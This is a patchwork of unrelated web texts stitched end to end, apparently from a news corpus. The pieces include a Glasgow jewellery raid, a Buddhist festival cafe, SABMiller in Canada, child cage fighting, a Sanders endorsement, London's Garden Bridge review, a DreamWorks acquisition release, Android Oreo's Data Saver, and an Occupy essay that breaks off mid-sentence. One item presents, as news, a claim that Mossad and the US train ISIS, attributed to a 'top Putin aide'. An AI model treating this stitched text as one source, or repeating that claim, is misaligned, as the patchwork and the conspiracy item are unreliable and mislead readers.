Media playback is unsupported on your device Media caption People inside the arcade fled as the robbers struck and triggered a smoke alarm
Four masked men armed with hammers have staged a daylight raid on several jewellers in Glasgow 's Argyll Arcade .
The men burst into the arcade , between Argyle Street and Buchanan Street , at about 12:45 .
They stole some watches from Rox and failed in bids to rob Mappin and Webb , Laing the Jeweller and Lewis Grant .
A security guard is said to have hurt his leg during the raid , which was photographed and recorded on mobile phones by stunned shoppers .
The raiders escaped down a lane off Buchanan Street . It is thought they used a white Volkswagen Golf , which was later recovered in Townhead .
In the mobile phone footage , the men can be seen running through the arcade and attempting to smash shop windows .
The centre also filled with smoke as an alarm on one shop was triggered .
Image caption The raiders attempted to smash the window at Mappin and Webb jewellers
Image copyright Liam Dargie Image caption The masked raiders fled via the Buchanan Street entrance past stunned shoppers
Image caption Police are at the scene and interviewing witnesses
The men entered the arcade from Argyle Street and exited on Buchanan Street , where footage shows them running down a lane .
It is understood that a security guard was knocked over during the robbery and injured his leg .
Police said the four suspects are described as 5ft 8in tall and of slim build . All were wearing dark clothing .
It is believed that they made off in a white hatchback vehicle .
A white Volkswagen Golf was recovered in St James Road , in the city 's Townhead area , and inquiries are ongoing to establish if it is the vehicle involved .
Officers are speaking to witnesses and gathering CCTV images to establish more details on the four men responsible .
Anyone with information is asked to contact police .
The Cafe is a not-for-profit , festival catering provider , offering a varied menu of organic , vegan food , substantially run by a volunteer team . We operate as a Buddhist work-as-spiritual-practice environment at an annual programme of festivals , camping events and large retreats . We have a strong environmental ethic : we prefer to use bakers and organic veg suppliers local to the event we are attending ; we use our own , custom built solar power rig and hot water heating system . The Cafe can also provide a sauna , showers , hot tubs , a cinema space , extra geodesic domes and parthenon tents .
Applications to volunteer with the Buddhafield Cafe will be open in 2019 - please sign up for our newsletter to be notified when applications open .
Who We Are
The Cafe began in the early nineties as a fundraising venture to cover the costs of taking a meditation teaching space to Glastonbury Festival . It 's grown into one of the largest festival cafés on the circuit , feeding hundreds of people a day on delicious freshly cooked , organic , vegan food and providing a welcoming haven of warmth and friendliness .
Although a core team works for Buddhafield and the Cafe all year round , some people join us just for a season , but many dips in and out . Not everyone is a Buddhist or even aspires to be , but everyone contributes to the ethos of the Cafe .
Work As Practice
Buddhism is not just something practiced at shrines or temples , it 's principles are routinely applicable to daily life . In the Cafe we encourage the development of awareness at work ; mindful in actions , speech and thoughts , cultivating kindly and generous impulses . We encourage our team to meditate , reflect and discuss the Buddha 's teaching and examine how it applies to tasks at hand .
Our ethical and environmental policies are a core part of our beliefs : to look after ourselves , those around us and our environment ; to treat ourselves , each other and our world with the respect that they deserve , in the understanding that they are not separate .
We keep waste to a minimum by recycling and composting whatever we can . All the food we prepare is fresh , organic and / or fairly traded , bought from local growers and suppliers wherever possible . We wish to support local economies and small businesses , promoting sustainable methods of food production . We usually use ceramic plates , bowls and mugs , metal cutlery or compostable alternatives where necessary . Power for the music and lights in the Café comes from solar panels .
What We Cook
We are well-known for our full , cooked vegan breakfast , soups and the Buddhafield Coconut Curry — a lightly spiced vegetable curry served with brown rice . There is often a roast dinner available on Sundays . Check out a sample daily menu .
Thanks to the brilliantly creative cooks who join us , the menu changes daily : it depends on what we have and what we feel like cooking ! So our Daily Special might be Baked Marinated Tofu with a Bulgar Wheat Pilaf , or Indonesian Stew with Satay Sauce . We always have a variety of salads , generous with toasted seeds , olives and tasty dressings . Our soups are also interestingly different each day and there is usually fresh , homemade soya yoghurt to go with fruit salad and organic muesli as an alternative to our full , cooked breakfast .
We ensure there are always wheat-free options available and can give assurances on other ingredients such as yeast or nuts where relevant . We order a wide range of organic vegetables , salads , herbs and fruit , as much as possible from local organic growers , to make sure there is an exciting selection for the cooks to choose from . Wholefoods , other cooking ingredients and our wholly biodegradeable cleaning products come from the Essential Trading Co-operative , based in Bristol , are GMO free , organic and fair-trade whenever possible .
Our food and drink is usually served on ceramic plates , bowls and mugs with metal cutlery , all of it bought from public recycling centres in Devon . This eclectic design standard may result in a your mug , bowl or plate proving itself a novel talking point !
Our Tents and Structures
Our tents are custom made by Buddhafield . Canvas covered , they are based around an extendable parthenon shaped aluminium frame . The standard sized version is 25m x 8.5m , with the busy open-plan kitchen completely on view behind a colourful and inviting counter . The seating area is light and airy with low level seating at beautifully painted tables . Colourful rugs cover the floor . A canopy of billowing , sail-like fabric , in blues , oranges , golds and pinks , creates a warm and cosy , yet spacious feeling . The outside is decorated with prayer flags , painted banners , bunting and large colourful flags .
We have a smaller tent which we run as a take-away café for use at smaller or one-day events . This is more versatile , quick and easy to erect and does not require the large teams we need to run the full shebang ( as few as seven people per shift ) . The menu is simpler , with crêpes , veggie burgers and baked potatoes served all day .
We can also adapt our set-up to offer a spa garden — complete with sauna , hot tubs , showers and chill-out space — and a cinema .
Insurance , Health & Safety
We are registered with our local authority , Mid Devon District Council , and have full public and employment liability insurance . Principle Café management documentation is available in another section of this website .
MONTREAL — A beer war is brewing in Canada as SABMiller seeks to grow its presence following its divorce from partner Molson Coors .
Just four months after forming a Canadian subsidiary , the world 's second-largest brewer is targeting dominant rivals Molson Coors ( and Inbev 's Labatt ) .
“ To say that we 're going to overtake the two big boys would be a bit of stretch so I would be happy to settle in at No . 3 , ” said general manager Paul Verdu .
To get there , SABMiller Canada hopes Miller Lite — which used to be available in Ontario and Newfoundland but has n't been sold in the country since 2010 — will steal market share from dominant players Coors Light and Bud Light .
Miller Genuine Draft , previously sold for about 20 years through a partnership with Molson Coors Canada , and premium brands such as Peroni , Pilsner Urquell and Grolsch will also be sold in Canada , though primarily outside Quebec .
All of SABMiller 's products will be imported from the United States or Europe .
Global demand for light beers has been growing . It accounts for about half of total beer sales in the U.S. , but less than 30 % in Canada .
Beer market specialist Plato Logic estimates light beers account for 20 % of total beer volume and have been growing 2.1 % annually over the past five years .
Verdu sees opportunities for the “ original ” light beer — Miller Lite — if only the beermaker can convince Canadian drinkers to give it a try .
The company plans to spend heavily to promote its brands and hopes to get help by not charging Ontario bars and restaurants the hefty premium they face from all other brewers except Brick Brewing 's Waterloo brand .
The move , which will amount to establishments paying the same amount that consumers fork out at the Beer Store , is an incentive for bars and restaurants to carry more SABMiller brands , says James Rilett , Ontario vice-president of industry association Restaurants Canada .
“ Miller sees themselves as a new player so they are trying to get market share and if that 's how they want to do it — give our members a fair price — then more power to them , ” he said in an interview .
He added bars and restaurants will save an average of $ 10 per case of beer , or almost $ 75 million annually .
Rilett hopes other brewers will follow SABMiller 's lead , but there is no sign yet of change .
Labatt and Molson Coors said they do n't discuss pricing or marketing strategies .
Verdu said SABMiller is also trying to appeal to Canadian consumers by promoting the taste and features of its products instead of “ gimmick marketing ” that focuses on lifestyle advertising .
Analyst Brittany Weissman of Edward Jones does n't expect Canada 's large brewers will sit back quietly .
Molson Coors recently said it would aggressively step up its advertising efforts as it looks to reverse market share losses and spur volume growth .
Weissman warns that spending alone wo n't necessarily offset the loyalty consumers have for their favourite brands .
“ Just because Miller has a message out there does n't mean that consumers are necessarily going to listen to it , ” she said from St. Louis . “ But it does increase the competition . ”
Tyler Chamberlin , associate professor at University of Ottawa 's Telfer School of Management , said the brewing industry faces global challenges as consumers flock to micro , craft and local brewers and reject “ generic flavours ” promoted by mega-brewers .
“ SABMiller 's focus on flavour would seem to fit better with the current consumer tastes , though whether a mass producer can actually convince the public that this is their authentic approach to business remains to be seen , ” he wrote in an e-mail .
23.1k SHARES Tweet Share Share Print Send
A top aide to Russian President Vladimir Putin on Sunday accused Israel and the United States of training the Islamic State in order to undermine Moscow 's interests in the Middle East
In an interview with Iranian state television , Alexander Prokhanov said that Mossad agents were training ISIS fighters in Syria and Iraq .
“ ISIS is a tool at the hands of the United States . They tell the Europeans that if we ( the Americans ) do not intervene , ISIS will cause you harm , ” he told PRESS TV .
“ They launched their first terror attack against us just a few days back in Chechnya , ” he said .
Gunmen attacked a police post and stormed a building on Thursday in Grozny , capital of Russia ‘ s southern province of Chechnya , killing 10 policemen in clashes in which 10 of the attackers were also killed .
The bloodiest fighting in Chechnya for months erupted a few hours before President Vladimir Putin said in a speech in Moscow he would defend Russia against what he called attempts to dismember it .
The attack underlined the fragile security situation in Chechnya more than a decade after Putin sent troops to quell an Islamist separatist uprising there .
Ten policemen and 10 suspected militants were killed , Russia 's National Anti-terrorism Committee ( NAK ) said , adding that another 28 law enforcement personnel had been wounded .
However , Putin praised the Kremlin-backed leader of Chechnya , Ramzan Kadyrov , for carrying out a “ professional ” security operation .
SEE ALSO : Fidel Castro : US & Israel created ISIS
Source : http : //www.jpost.com/Middle-East/Top-Putin-aide-Mossad-training-ISIS-terrorists-in-Iraq-Syria-383964
Home > Simulation > Crime Fighter Freeware Download
Rate This Game : - - - - - 0 % 10 % 20 % 30 % 40 % 50 % 60 % 70 % 80 % 90 % 100 % Rate ! Link to This Game http : //www.pcgaming.ws/viewgame.php ? game=crime_fighter Download Crime Fighter
Crime Fighter Developer : Peter Steffen Year : 2002 Genre : Simulation Rating : 91 % Downloads : 13,698 Size : 861 KB Added : 16 years ago
Our Crime Fighter Review
Unlike the name of the game announces , you do n't fight against crimes , but you try to commit as much of it as possible . For example you can play pickpocket , raid supermarkets and hotels , steal cars , raid banks , attack mail trains , and so on . As soon as you have a high standing in the criminal underworld , you are also able to sign on gangsters that join your gang . These gangsters then can be trained or equipped with weapons like machine guns . Your aim is to seize the power in the underworld . But it 's very challenging , especially if you 're playing with more than 2 players . This game is very addicting , if you do n't mind the 2D graphics .
11 User Comments
Post a Comment
Full Metal Village is a 2007 documentary film about the lives of the residents of a small village in the German state of Schleswig-Holstein , Wacken , in a series of interviews and visual tableaux as it prepares for the annual Wacken Open Air Festival . Taglined `` Ein Heimatfilm '' , the director Cho Sung-Hyung explores the relationship of the 1,800 resident townsfolk and the brief annual influx of 70,000 metal music enthusiasts [ 1 ] who attend the open-air concert .
Notable scenes of the film are elderly villagers who confess to have 'heard ' that the concert-goers worship Satan , and over-enthusiastic concert-goers headbanging to the traditional regional anthem played by a local fire department band to open the festival .
Awards [ edit ]
The film has so far garnered all three awards for which it has been nominated : [ 2 ] the 2007 Best Documentary at the Guild of German Art House Cinemas , the 2006 Best Documentary at the Hessian Film Award ( prior to the film 's theatrical release ) and the 2007 Max Ophüls Award at the Max Ophüls Festival .
References [ edit ]
Most kids fight . In the car . At the park . On the trampoline . And they fight over everything .
This is normal . ( Yes , breathe . Your brawling kids are pretty normal ) .
But you know what is n't normal ? When fighting kids are thrown in a ring and their parents cheer them on .
Cage fighting for kids is the latest controversial sport playing out in America and it 's gathering momentum . Last night , Channel 7 's Sunday Night aired a story about junior mixed martial arts ( MMA ) events for kids as young as six . The ring is on a site in California that is situated on Indian reservation so it is n't subject to Californian Law – under which , it would be completely illegal .
Like it is in most US states .
And in Australia .
For most , this little loophole is terrifying , unfair , brutal and sad . Some even argue that it 's simply child abuse .
But the most terrifying part is that there are parents who are up for it . Take a look .
Apparently , we should be comforted to know that there are rules and ‘ boundaries ' like no kicking or punching above the collarbone and that opponents are determined by weight , not gender . ( But strangling is allowed . Huh ? ) .
David Bramlette 's son , Mason “ The Beast ” has been fighting since he was diagnosed with ADHD . His Dad thinks it 's the best thing for him , “ I just do n't feel football is safe for a kid , I just I do n't . ”
Presidential hopeful Bernie Sanders , who already has received the nod from Democratic Arizona Congressman Raul Grijalva , has scored more endorsements from state Latino leaders .
State Senator Martin Quezada ( D-Phoenix ) and Maricopa County Supervisor Steve Gallardo joined about a dozen other Latinos — most of them members of the Arizona Legislature — to announce their endorsement of Sanders . Among those endorsing him also were non-Latinos , including state Representative Reginald Bolding ( D-Laveen ) and state Senator Andrea Dalessandro ( D-Sahuarita ) .
Quezada said he is behind Sanders because he believes the Vermont senator has stayed true to the ideals that Americans want in an elected official .
Continue Reading
“ He 's an individual who puts American ideals before special interests , ” Quezada said . “ He 's a candidate who puts the voters ahead of lobbyists . And he 's a candidate who puts people ahead of corporations . Those are things that so many politicians nowadays do not do anymore . ”
The backing of Quezada and other Latino leaders is significant for the Sanders campaign as it tries to court Hispanic voters in Arizona . The state has the nation 's fifth-largest Latino statewide eligible voter population . There are about 902,000 Latinos living in Arizona who are eligible to vote , according to the Pew Research Center .
Nationwide , Sanders is closing in on Hillary Clinton 's lead . A Quinnipiac University poll released this month finds 44 percent of Democrats say they support Clinton , compared with 42 percent who say they support Sanders .
But among Latinos , Clinton has a substantial lead over Sanders . A recent NBC News|SurveyMonkey Weekly Election Tracking poll found 54 percent of Hispanic voters support Clinton and 33 percent support Sanders .
The Vermont senator mainly has struggled with name recognition among Latino voters . As a way to help with that , his campaign added a number of influential Latinos to his campaign team . They include Erika Andiola , a 28-year-old undocumented immigrant from Arizona who made national headlines when she posted a tearful video on YouTube moments after immigration officials came to her home in Mesa and arrested her undocumented mother and brother .
“ It is time that we elect somebody who truly understands what working families are going through everyday , ” said state Representative Richard Andrade ( D-Phoenix ) . Facebook
Twitter
More shares reddit email
Jose Miranda , state director of Sanders ' campaign in Arizona , said his group is trying to gain support for Sanders among Latino voters by going door to door and talking directly with voters in English and Spanish . He said it 's easy for the campaign to appeal to Latino voters because Sanders has an agenda that is in line with issues Latinos support , such as immigration .
“ Bernie cares very deeply about deportations and raids that are happening , especially here in our community , ” Miranda said . “ But even beyond that , Latinos also care about jobs and about whether their kids have access to a good education . ”
State Representative Richard Andrade ( D-Phoenix ) said the Democratic presidential candidate is advocating for paid sick leave and to raise the minimum wage , issues that he said affect working families . In endorsing Sanders , Andrade noted that he recently introduced bills in the Arizona Legislature that would address these same issues .
“ It is time that we elect somebody who truly understands what working families are going through everyday , ” Andrade said . “ Bernie Sanders is definitely that one person who 's going to put us in the right direction , because he puts working families first . He does n't put corporations and big businesses first . ”
The city of Montreal and the borough of Côte-des-Neiges – Notre-Dame-de-Grâce are opening the city 's first permanent “ fab lab ” inside a city library . Four more are on the way too .
Borough mayor Russell Copeman and the city of Montreal 's Smart City lead Harout Chitilian were on hand to unveil the space Monday at the Benny Library Cultural Centre Notre-Dame-de-Grâce .
“ We 're very pleased to once again be on the cutting edge of developments in our public library system , ” said Copeman . “ It will be an opportunity for people to come and work with 3D printers , co-creation and co-ideation all inside a permanent fab lab in a public library . ”
A fab lab is a fabrication laboratory . They are digital manufacturing workshops in which machines like 3D printers are available to citizens to allow them to develop individual and collective projects . These places support DIY ( Do It Yourself ) and DIWO ( Do It With Others ) movements . They rely on the sharing of knowledge and expertise and encourage testing , creativity and community outreach .
Annonce : Lancement du premier # FabLab permanent dans une bibliothèque québécoise à la bibliothèque Benny pic.twitter.com/f9cR5OtUwt — mtlvi ( @ mtlvi ) August 1 , 2016
The implementation of digital workshops and fab labs in libraries is one of 70 projects in the Montreal Action Plan , digital and intelligent city from 2015 to 2017 . The opening of “ Fab Benny , ” said the City , will help strengthen libraries as welcoming places that support creative abilities .
“ One of the steps we made in the Smart City initiative is that it 's not about technology . Technology is a means to enable smart citizens , ” said Chitilian . “ You need to have smart , engaged , curious citizens and the fab lab is a means to engage those people . ”
READ ALSO : Smart City lead Harout Chitilian plays cheerleader to the city
During the press conference the library revealed that the new fab lab will be open to the public Wednesdays and Sundays . Free workshops will be held on those days where people can come with their own projects and get support . Other activities are also planned for the fab lab , including the “ Fix Café , ” or one-off repair workshops .
Fab labs are closely tied with 3D printing technology , something Mayor Copeman admitted he 's new to . Still , he was enthusiastic about the “ world of possibilities ” that such technology comes with .
“ I have a dilapidated and aging cottage in Sainte-Agathe-des-Monts . I go to my local hardware store and I said “ this is the piece that 's breaking down ” and they say “ too bad , it 's more than 50 years old. ” You could literally scan that , do a computer program and produce it , and if it was n't in the right material you could send it to someone and have the right piece made for you , ” said Copeman .
“ I think it 's this whole notion of people coming together , thinking of new things and conceptualizing the future . It 's not Do it Yourself , it 's Do it With Others . I think it opens up tremendous possibilities . ”
It was around 2014 when I first moved to LA . One of Syd [ Tha Kyd 's ] childhood friends – his name is Justin , he 's a photographer also and shoots their day-to-day stuff and goes on tour with them – randomly sent me a DM [ on Instagram ] one day and said , “ You should shoot Syd ' . ”
I was already familiar with The Internet and just Odd Future in general … so I was like , “ Of course I would love to do it. ” So we shot just me and Syd the first time in a studio in Downtown LA and it was no real theme or anything . It was just like , “ Bring some clothes. ” I had some backdrops , and let 's just see what we can get .
[ It was the ] evening so she was already kind of tired from the day , so the shoot was just really laid back , just really chill . We just had some different backdrops . She just brought some different clothes , I had some balloons and some confetti , just random props laying around and we just worked out and just meshed real well .. [ But ] we did n't even talk after that . She posted the pictures – she used them for a couple things – so I knew she liked them but we did n't really become friends yet .
And she sent me an email a couple months later , asked if I wanted to shoot the band 's album cover for Ego Death . So that 's when I was able to meet the rest of the band . And from there that 's when I started to hang with them more and start to connect with them . And that 's when we started to kind of build a relationship that continued to go on even after the Ego Death album .
The future of London 's controversial Garden Bridge hangs in the balance after Sadiq Khan launched a review into the troubled project .
The London mayor has appointed former chair of Parliament 's public accounts committee Margaret Hodge to `` investigate the conduct '' of the last administration in authorising what would be the most expensive and controversial public footbridge in the world .
With the project struggling to gain private funding and questions still hanging over the procurement process , Hodge has been asked to examine whether the £185m footbridge still represents `` value for money '' .
Officially Khan remains committed to the project . However , Politics.co.uk understands that privately he is strongly opposed to it .
One source at Transport for London said : `` The mayor and his team are bitterly opposed to it . I think Sadiq just does n't want to shoot it down publicly yet . ''
A highly critical review by Hodge could be the precursor to the mayor removing City Hall 's support for the bridge .
In a statement today Khan insisted that Londoners `` deserve more information '' about the project .
`` I 'm clear that since the beginning of the project there has n't been the necessary standard of transparency and openness around the Garden Bridge , '' he said .
`` Nearly £40m of public money has already been spent on the Garden Bridge project , and Londoners deserve far more information about the decisions that have been made around how their money is being spent .
`` Margaret Hodge is hugely respected for her work scrutinising some of the UK 's largest and most high-profile publicly funded bodies . There 's no better qualified person to get to the bottom of the procurement process around the Garden Bridge , and establish whether Londoners have been getting value for money since the project began . I am absolutely clear that no new London taxpayers ' funds should be committed to the Garden Bridge , but I 'm also determined that the Garden Bridge review helps the project achieve higher standards of accountability and transparency it has so far been lacking . ''
Hodge insisted that she would take a neutral approach to assessing the project .
`` It 's not a project that I have previously had an opinion on either for or against , '' she said .
`` But given the millions of pounds of public money allocated to the project , it is clear that there needs to be far more transparency around how funds are being spent . The planned bridge is a major project in an iconic part of London , and there are clearly questions that remain unanswered around issues like procurement . ''
Controversy over the procurement process has long plagued the project . Critics have accused former mayor Boris Johnson of `` rigging '' the process in favour of Heatherwick Studios and Arup .
Documents uncovered by the Architects Journal suggest that Johnson told TfL he was in favour of Heatherwick , before the supposedly open competition to design the project had even been launched .
Transport for London officials have previously admitted to the London Assembly that the procurement process was neither open nor objective .
Doubts also remain about the financial viability of the project . Delays to the project have significantly increased the total cost . The project 's backers have yet to acquire the necessary private donations required for it to go ahead . Last month the government announced that it had reduced its own financial guarantee to the project .
Khan 's review was today welcomed by critics of the bridge .
`` The Garden Bridge has been dogged by scandal and a lack of transparency since its inception , so I welcome the mayor 's appointment of Margaret Hodge to conduct a review into the project , '' Labour London Assembly member Tom Copley said .
`` Large sums of taxpayer 's money have been committed to this project , and so it 's vital that the public have confidence that their cash is being used properly , not being fritted away frivolously on a Boris Johnson vanity project . ''
However , Liberal Democrat London Assembly member Caroline Pidgeon today urged the mayor not to use the review as a delaying tactic for taking action .
“ The mayor can not hide behind this latest review as an excuse for not taking any action , '' she said .
`` Although it was not his decision to start this project he increasingly makes excuses and apologies for the mess first started by Boris Johnson .
`` It is time Sadiq Khan finally said he will not underwrite any taxpayer funded bailouts for the maintenance of this project .
`` His current stance of providing a permanent taxpayer bailout to pay for the maintenance of the bridge while claiming to never provide any further public funding for the project is utter nonsense and indefensible . ''
Nicholas Burns , the State Department spokesman , said American aid to the force of British , French , Dutch and Belgian soldiers would ultimately reach $ 95 million , including $ 60 million worth of equipment and logistical , airlift and intelligence support . He said the rest of the aid would be in the form of $ 35 million in cash to the force . The $ 60 million would come from the Pentagon funds , while the source of the remainder has not been determined .
`` We 're going to go ahead with this despite the letter , '' Mr. Burns said . `` We can not leave our allies in the lurch . This is the right strategic choice . ''
In their letter , Mr. Dole and Mr. Gingrich said the President 's move `` to circumvent the will of Congress is likely to lead to restriction '' of the Administration 's budgetary flexibility in the future .
Newsletter Sign Up Continue reading the main story Please verify you 're not a robot by clicking the box . Invalid email address . Please re-enter . You must select a newsletter to subscribe to . Sign Up You will receive emails containing news content , updates and promotions from The New York Times . You may opt out at any time . You agree to receive occasional updates and special offers for The New York Times 's products and services . Thank you for subscribing . An error has occurred . Please try again later . View all New York Times newsletters .
They also criticized the President for allowing American aircraft to provide close air support to the new reaction force when United Nations officials have opposed recent calls from NATO for permission to bomb Bosnian Serb sites .
They wrote that `` it is unconscionable for U.S. air crews '' to be subjected to greater risks than necessary because United Nations officials oppose bombing Bosnian Serb air defenses .
White House officials said much of the $ 15 million the President authorized today would be used to carry Dutch and British troops and their equipment to the former Yugoslavia . Some of the money will also go to provide night-vision goggles and equipment for satellite communications .
Administration officials say they are urging the United Nations to give the reaction force a more robust mandate than the peacekeepers already in Bosnia .
Officials have said they hope that the new force will help prevent the withdrawal of the peacekeepers from Bosnia . Mr. Clinton has pledged 25,000 American troops to help in the event of such a withdrawal .
While some Republicans complained that diverting the money from the Pentagon would hurt military readiness , Clinton aides insisted that the money could be spent without compromising the American military .
Michael Thomas achieved multiple milestones in the New Orleans Saints ' win over the New York Jets on Sunday .
The former Ohio State wide receiver became just the second player in NFL history with 90 or more catches in each of his first two seasons .
Congratulations to @ Cantguardmike , who joins @ OBJ_3 as the only two players in NFL history to have 90+ recs in each of their first two seasons. # SaintsGameday | # NYJvsNO pic.twitter.com/yutdcomR4W — New Orleans Saints ( @ Saints ) December 17 , 2017
Thomas , who had 92 receptions for 1,137 yards in his rookie season last year , also surpassed the 1,000-yard mark for a second consecutive season on Sunday .
With nine catches for 93 yards in the Saints ' 31-19 win ( which was capped by an interception by fellow Ohio State product Marshon Lattimore ) , Thomas now has 94 receptions for 1,085 yards with two games remaining in his second NFL season .
NEW YORK -- ( BUSINESS WIRE ) -- Advancing its position in kids and family entertainment , NBCUniversal , a division of Comcast Corporation ( NASDAQ : CMCSA ) , today announced it has completed its acquisition of DreamWorks Animation SKG , Inc. ( DWA ) . The studio will become part of the Universal Filmed Entertainment Group , which includes Universal Pictures , Fandango , and NBCUniversal Brand Development .
Under terms of the deal valued at approximately $ 3.8 billion , DWA stockholders are receiving $ 41 in cash for each share of DWA common stock , and post-closing , DWA shares will no longer be listed on the NASDAQ .
In addition , on September 21 , 2016 , DWA will redeem all $ 300 million aggregate principal amount outstanding of its 6.875 % Senior Notes due August 15 , 2020 at a redemption price of 105.156 % of the principal amount thereof , plus accrued and unpaid interest to , but not including , the date of redemption .
About NBCUniversal
NBCUniversal is one of the world 's leading media and entertainment companies in the development , production , and marketing of entertainment , news and information to a global audience .
NBCUniversal owns and operates a valuable portfolio of news and entertainment television networks , a premier motion picture company , significant television production operations , a leading television stations group , world-renowned theme parks , and a suite of leading Internet-based businesses . NBCUniversal is a division of Comcast Corporation .
About DreamWorks Animation
DWA is a global family entertainment company with business interests that span feature film and television production ; licensing and consumer products ; location-based entertainment ; and new media properties , including the company 's controlling interest in AwesomenessTV . The company 's feature film heritage includes many of the world 's most-beloved characters and franchises , including Shrek , Madagascar , Kung Fu Panda and How to Train Your Dragon , while its 32 feature film releases have amassed more than $ 13 billion in global box office receipts . DWA 's television business has quickly become one of the world 's leading suppliers of high-quality family programming , reaching consumers on linear and on-demand platforms in more than 130 countries and winning a total of 25 Emmy™ Awards to date . The company 's deep portfolio of intellectual property is supported by a robust , worldwide consumer products practice , which includes licensing , and location-based entertainment venues around the world . DWA is also the majority owner of AwesomenessTV , a leading video destination for Generation Z and Millennial audiences , and also owns 45 % of Oriental DreamWorks , a world-class animation studio in China that produces family entertainment for both Chinese and global audiences .
Note : This press release contains forward-looking statements . Readers are cautioned that such forward-looking statements involve risks and uncertainties that could cause actual events or our actual results to differ materially from those expressed in any such forward-looking statements . Readers are directed to Comcast 's periodic and other reports filed with the Securities and Exchange Commission ( SEC ) for a description of such risks and uncertainties . Comcast does not undertake any obligation to update any forward-looking statements .
OEMs are Required to Implement Data Saver Mode for Handheld Devices in Android Oreo
As with a lot of new features added into Android Nougat , Data Saver Mode was a new feature that was only recommended by Google . This Data Saver feature that Google added to Android does more than just restrict background data usage though . It 's an actual API that allows some applications to continue to function as long as they limit data usage . After reviewing the updated Compatibility Definition Document for Android Oreo , we can see that Data Saver Mode is now required for handheld devices that include a metered connection .
On top of Treble requiring the biggest architectural change to Android ever , the engineers at Google have been working to improve battery life as well . They have been easing into this process with Doze Mode in Marshmallow and then expanded this feature in Nougat too . JobScheduler debuted in Lollipop and is now an integral component to saving battery life and keeping applications in a deep sleep mode with the new Android Oreo update .
Google 's goal here is to give Android devices multi-day battery life and this requires certain limitations . On top of the work Google has been doing here , they also want to give more control to those who own an Android device too . As part of the Compatibility Definition Document for Android Nougat , Google had only “ strongly recommended ” that an OEM include Data Saver Mode on their handheld devices which included a metered connection .
To Google , a handheld device is something like an MP3 player , smartphone or tablet . It is considered handheld when it comes with a power source that provides mobility ( such as a battery ) , and also has a screen size in the range of 2.5 inches to 8 inches . If an OEM releases a device that meets these requirements and uses Android Oreo then it must include Data Saver Mode if it also has the ability to use a metered connection ( aka a cellular network ) .
0 Flares Filament.io 0 Flares ×
I 'm not surprised that Rick Perry is fundraising off of his two indictments . He 's trying his damnedest to make the case sound like a farce despite the very serious nature of the charges .
I am , however , surprised to see another sitting Republican Governor actually coming to the defense of the once and future failed Presidential candidate .
To date , Perry 's RickPAC has sent at least three fundraising emails to gin up funds for his “ leadership PAC ” that he will in turn contribute to other candidates who can not count to three .
Current Louisiana Governor Bobby Jindal actually sent a fundraising email to the RickPAC list to raise funds for Perry . It included a tasteless and inflammatory video featuring footage of Travis County DA Rosemary Lehmberg , whose arrest for DWI has apparently become the focus of Perry 's efforts to combat his legal issues .
Perry is also selling tee shirts with his smirking mugshot on them , apparently trying to milk his last few minutes on the national stage for all they 're worth .
This week , Perry started a hashtag , # IStandWithRickPerry , to generate grassroots support on Twitter . Hmmm… . sound familiar ?
His campaign — err , his “ leadership PAC ” — sent an email asking people to give $ 5 and get a bumper sticker .
Unfortunately the email failed to mention the bumper sticker part in the email . Oops .
Overall , Perry 's public defense seems to hinge on painting the indictment as partisan politics , despite the fact that the Travis Co. DA 's office and a Travis Co. District Judge recused themselves , and a special investigator appointed to the case was appointed by a Republican .
His strategy seems to be working among his base , which is perhaps key to his 2016 Presidential ambitions . But at the same time I ca n't help but wonder if emphasizing his felony indictment to a national audience is really a way to appeal to eventual general election swing voters .
But hey , at least it 's a tad more creative than his original fundraising appeals about the evils of DNC Chairwoman Debbie Wasserman-Schulz .
There is a segregation growing between the presumed supporters and detractors of the ‘ Occupation ' movement that has spread across the Western World and beyond in the last eight weeks . While in the beginning , the discussion was slow , weak and pitiful , public discourse has come to assume a discourse on the matter . Opinions are split straight through various groups of friends and families from all sorts of class backgrounds .
However , there is still the question as to what the driving force , motivation and endgame of the action is or will be . It would seem that this is the driving force behind the debate as well . The restricted publicity obtained by OWS , or even our very own Occupy Dame Street , leads you to believe that the participants have no clue what they are talking about . The parameters are set cleverly surrounding the isolated freak that has gathered the attention of the crowd by somehow managing to place his ideological foot firmly up his own ass and has then pulled it from his mouth . Make no mistake about it then , there are people out there who are simply caught up in the flux of empathetic activism . That being said , I really do not know one person who has not at one time or another . However , there exists , somewhere out in that maelstrom of heated hyperbole and graphic designs , groups of highly dedicated and intelligent folk . People who have researched their hatred , people who have worked in the industry itself and people who are simply tired and enraged by current fiscal weather conditions .
Moreover , what can be found personally curious , and at some points enraging , is the idea that a group or individual could find this activism corruptive , disgusting , counter-productive , or even pathetic . In terms of a pessimistic segregation of opinion , I find it increasingly difficult to see how people can view this action as empirically wrong ? In the U.S. people are inherently divided as almost a direct result of their adolescent historical narrative coupled with their bewildering reliance on a strictly partisan political system . This can be seen as a simplistic reason as to why debate across the pond often seeps into the cracks of nearly every single mundane little opinion , operation or semantic of life . Given this idea , it is easy to see how their national discussions can sometimes slip hard and fast into perceptive obscurity . In this sense , the OWS movement was never going to be able to avoid the partisan divide , let alone even hope for a bi-partisan following ( although there does exist an intersection ) . In Ireland , however , it is reasonably uncommon for something of this nature to cause even a blip on controversy 's scale . For all intents and purposes , we seem to be always caught between action and apathy .
We catch on late , usually after the bandwagon has cruised by , even if at an alarmingly slow speed . Nevertheless , we are on this wagon for good or ill. My opinion certainly was n't asked for , but here it is anyway . This movement , although misguided in places , is a good thing . Holistically benevolent in its desires and homeopathic in its achievements . A small drop of this highly diluted substance can , and will , alter things over the course of time . Sure , to some it may seem like a whitewash of ‘ Useless Idiots ' and bullshit , but the people who think this generally have more in common with misinformed protestors than they thought . The majority of ‘ nay-sayers ' and fiscal whore-mongers either retain sub-prime information on the situation at hand , or are delightfully blinded by the “ inherent beauties of the free market ” . As the bonuses stack up it must be very hard to stand behind the mountain range of veritably shocking evidence that weighs against the financial services industry . In one respect , it would be admissible to point out the large scale monetary corruptions at the heart of academic business and economics . Even within some Business Ethics courses , the department heads have been found to be holding various positions that would espouse even the simplest definitions of a conflict of interest . These positions , for the most part , never end up on their C.V. 's but hide in obscurity as they are called ‘ advisors ' and ‘ consultants . ' But then there is an “ internal logic ” to this system ; a descriptive morality for a poorly regulated market that lets the key players either set the parameters or petition the governmental powers to tweak the necessary boarders , all the while the margins grow thinner and thinner and eventually their customers begin to fall off the financial service 's bandwagon of unrestricted and inexplicable profit . Similarly , the misinformed occupier will be astute in his/her proclamation that all banks are bad . When asked why the Occupy Dame Street ( ODS ) movement had taken residence outside the Central Bank a man responded , “ Well…because it 's a bank… ” This ambiguously broad response perpetuates the infuriating reaction to the protest as a whole and , in most respects , 